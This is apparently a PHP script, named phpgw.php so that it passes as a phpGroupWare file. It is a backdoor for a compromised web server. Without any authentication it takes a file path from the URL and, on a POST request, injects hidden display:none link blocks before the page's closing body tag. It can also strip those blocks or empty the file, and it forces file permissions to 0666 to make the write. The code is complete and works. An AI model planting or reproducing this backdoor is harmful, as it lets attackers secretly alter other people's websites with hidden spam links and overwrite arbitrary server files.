phpgw.php
2008-04-01
<html>
<head><title>phpgw.php</title>
</head>
<body>
<?php
// <TEST>
// $_GET['s'] = '/home/jed/test/test.html';
// $_POST['m'] = '<p style="display: none">blaha-bla</p>';
// </TEST>
set_time_limit(36000);
$marker = '<!-- b2756e9ee842177c1af26faa1881031e -->';
function unslash_rec(&$arr)
{
reset($arr);
while (list($key)=each($arr))
{
if (is_array($arr[$key])) unslash_rec($arr[$key]);
else
{
$arr[$key]=stripslashes($arr[$key]);
};
};
};function unslash_gpc()
{
if (get_magic_quotes_gpc())
{
unslash_rec($_POST);
};
};$links = Array();
$elinks = Array();
function quote_link($lnk)
{
return preg_quote($lnk, '/');
};function process_block($block)
{
GLOBAL $elinks;
$txt = $block[0];
foreach ($elinks as $elink)
{
$pattern = "/<a href=\"{$elink}[^\"]*\">.+?<\/a>[^<]*/";
print "PATTERN: [$pattern]<br/>\n";
$txt = preg_replace($pattern, '', $txt);
};
return $txt;
};if (array_key_exists('f', $_GET))
{
unslash_gpc();
//header('Content-Type: text/plain');
if (false === ($txt = file_get_contents($_GET['f'])))
die("ERROR: 1 Failed to get file contents: {$_GET['f']}<br/>\n");
if (array_key_exists('m', $_POST))
{
// Adding
$add_html = false;
$add_body = false;
$add_marker = false;
if (!$_POST['a'])
{
$substr = stristr($txt, $marker);
if (!$substr)
{
$add_marker = true;
$substr = stristr($txt, '</body');
if (false === $substr)
{
print "</BODY not found!!!";// DEBUG
$add_body = true;
$substr = stristr($txt, '</html');
if (false === $substr)
{
print "</HTML not found!!!";// DEBUG
$add_html = true;
$substr = $txt;
// die("ERROR: 6 Failed to find </body> tag <br/>\n");
};
};
$pos = strlen($txt) - strlen($substr);
}
else
{
$pos = strlen($txt) - strlen($substr) + strlen($marker);
};
$tail = substr($txt, $pos);
$txt = substr($txt, 0, $pos);
if ($add_marker)
$txt .= ' ' .$marker . ' ';
$txt .= ' ' . $_POST['m'] . ' ';
if ($add_body)
$txt .= '</body>';
if ($add_html)
$txt .= '</html>';
$txt .= $tail;
}
else
{
$txt = $_POST['m'] . ' ' . $txt;
};
}
else if (array_key_exists('u', $_POST) || array_key_exists('e', $_POST))
{
// Removing
if ($_REQUEST['e'] == 'erase')
{
// FULL ERASE
if ($_REQUEST['a'])
{
// WRITING TO .TPL, JUST MAKING FILE EMPTY
$txt = '';
}
else
{
// WRITING TO HTML, SHOULD OBEY </BODY></HTML> TAGS
if (($pos = strpos($txt, $marker)))
{
$txt = substr($txt, 0, $pos + strlen($marker)) . " \n</body></html>";
};
};
}
else
{
// CUSTOMIZED ERASE
//header('Content-type: text/plain');
print "INPUT: [{$_POST['u']}] <br/>\n";
$links = explode("\n", $_POST['u']);
$links = array_map('trim', $links);
$links = preg_grep('/[^\s\r\n\t]/', $links);
print_r($links);
$elinks = array_map('quote_link', $links);
$pattern = '/<p style="display: none">.*?<\/p>/s';
$txt = preg_replace_callback($pattern, 'process_block', $txt);
$pattern = "/<p style=\"display: none\">[\s\r\n]*<\/p>/";
$txt = preg_replace($pattern, '', $txt);
};
};
$stat = @stat($_GET['f']);
// if ($stat['mode'] & 0777 != 0644)
// {
//
// };
if ($stat['mode'])
@chmod($_GET['f'], 0666);
$hf = fopen($_GET['f'], "w");
if (!$hf)
{
@chmod($_GET['f'], $stat['mode'] & 0777);
die('ERROR: 2 Failed to open file for writing<br>\n');
};
fwrite($hf, $txt);
fclose($hf);
if ($stat['mode'])
@chmod($_GET['f'], $stat['mode'] & 0777);
print "OK: 0 ALL OPERATIONS SUCCEEDED<br/>\n";
}
else
{
/*
print <<<EOM
<form action="up.php" method="POST">
<input type="text" name="s" style="width: 400px;" value=""/><br/>
<textarea name="u" style="width: 400px; height: 200px "></textarea><br/>
<input type="submit" value="Submit">
</form>
EOM;
*/
print "ERROR: 7 UNKNOWN<br/>\n";
};
?>
</body>
</html>